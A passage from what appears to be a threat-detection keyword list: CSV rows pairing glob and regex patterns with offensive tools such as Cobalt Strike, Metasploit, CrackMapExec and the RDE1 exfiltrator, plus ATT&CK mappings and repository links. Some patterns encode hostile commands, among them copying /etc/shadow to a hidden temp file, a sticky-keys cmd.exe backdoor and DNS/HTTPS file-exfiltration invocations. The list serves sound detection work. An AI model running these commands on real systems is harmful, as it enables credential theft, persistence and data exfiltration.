TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*covid19_koadic.profile*",".{0,1000}covid19_koadic\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*cow-branded-longhorn.txt*",".{0,1000}cow\-branded\-longhorn\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cowpatty -f *.txt -r *.cap -s *",".{0,1000}cowpatty\s\-f\s.{0,1000}\.txt\s\-r\s.{0,1000}\.cap\s\-s\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Cowpatty*",".{0,1000}Cowpatty.{0,1000}","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/joswr1ght/cowpatty","1","1","N/A","N/A","2","167","39","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z" "*cowsay -f dragon 'PEzor!!*",".{0,1000}cowsay\s\-f\sdragon\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*cp ""/media/windows/Windows/System32/cmd.exe"" ""/media/windows/Windows/System32/*",".{0,1000}cp\s\""\/media\/windows\/Windows\/System32\/cmd\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*cp /etc/shadow /tmp/.*",".{0,1000}cp\s\/etc\/shadow\s\/tmp\/\..{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cp /var/log/audit/audit.log .tmp*",".{0,1000}cp\s\/var\/log\/audit\/audit\.log\s\.tmp.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*cp sliver-* 
/opt/tools/bin*",".{0,1000}cp\ssliver\-.{0,1000}\s\/opt\/tools\/bin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cpp_test_payload.exe*",".{0,1000}cpp_test_payload\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*Cr3dOv3r*",".{0,1000}Cr3dOv3r.{0,1000}","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1935","411","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z" "*cracf2john.py*",".{0,1000}cracf2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crack_databases.rb*",".{0,1000}crack_databases\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*crack_windows.rb*",".{0,1000}crack_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Crack-allDBs.git*",".{0,1000}Crack\-allDBs\.git.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*Crack-allDBs-main*",".{0,1000}Crack\-allDBs\-main.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v1.py*",".{0,1000}crack\-allDBs\-v1\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v2.py*",".{0,1000}crack\-allDBs\-v2\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","52","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*Cracked5pider/KaynLdr*",".{0,1000}Cracked5pider\/KaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - 
TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*Cracked5pider/KaynStrike*",".{0,1000}Cracked5pider\/KaynStrike.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *",".{0,1000}crackhound\.py\s\-\-verbose\s\-\-password\s.{0,1000}\s\-\-plain\-text\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-file\s.{0,1000}\s\-\-add\-password\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cracklord-master.*",".{0,1000}cracklord\-master\..{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*cracklord-queued*_amd64.deb*",".{0,1000}cracklord\-queued.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*cracklord-resourced*_amd64.deb*",".{0,1000}cracklord\-resourced.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*CrackMapExec*",".{0,1000}CrackMapExec.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec*",".{0,1000}crackmapexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.exe*",".{0,1000}crackmapexec\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","Windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*crackmapexec.spec*",".{0,1000}crackmapexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*crackpkcs12*",".{0,1000}crackpkcs12.{0,1000}","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - 
TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","135","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z" "*crackTGS*",".{0,1000}crackTGS.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*Crafting malicious SYN packet*",".{0,1000}Crafting\smalicious\sSYN\spacket.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Crandle_Builder.ps1*",".{0,1000}Crandle_Builder\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Crassus.csproj*",".{0,1000}Crassus\.csproj.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - 
TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*Crassus.exe*",".{0,1000}Crassus\.exe.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*Crassus.sln*",".{0,1000}Crassus\.sln.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","546","57","2024-01-08T09:38:34Z","2023-01-12T21:01:52Z" "*crate::modules::{rec2mastodon*rec2virustotal}*",".{0,1000}crate\:\:modules\:\:\{rec2mastodon.{0,1000}rec2virustotal\}.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*CravateRouge/autobloody*",".{0,1000}CravateRouge\/autobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*CravateRouge/bloodyAD*",".{0,1000}CravateRouge\/bloodyAD.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - 
T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*crawlLdrDllList*",".{0,1000}crawlLdrDllList.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*crcreditcards.txt*",".{0,1000}crcreditcards\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*crde dns -*",".{0,1000}crde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty 
Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde https -*",".{0,1000}crde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde::utils::checker*",".{0,1000}crde\:\:utils\:\:checker.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde_x64.exe dns -f *",".{0,1000}crde_x64\.exe\sdns\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*crde_x64.exe https -f *",".{0,1000}crde_x64\.exe\shttps\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*CrealPasswords.txt*",".{0,1000}CrealPasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Create %d IP@Loginl;Password*",".{0,1000}Create\s\%d\sIP\@Loginl\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" "*Create a raw socket to listen for ICMP packets cause f scappy we don't need that shit*",".{0,1000}Create\sa\sraw\ssocket\sto\slisten\sfor\sICMP\spackets\scause\sf\sscappy\swe\sdon\'t\sneed\sthat\sshit.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*CREATE DATABASE C2;*",".{0,1000}CREATE\sDATABASE\sC2\;.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*CREATE DATABASE jasmin_db*",".{0,1000}CREATE\sDATABASE\sjasmin_db.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 
- TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*CREATE TABLE [LDAPHUNTERFINDINGS]*",".{0,1000}CREATE\sTABLE\s\[LDAPHUNTERFINDINGS\].{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*create_dummy_dll_file*",".{0,1000}create_dummy_dll_file.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*create_nemesis_db(*",".{0,1000}create_nemesis_db\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*create_nemesis_db_pool(*",".{0,1000}create_nemesis_db_pool\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" 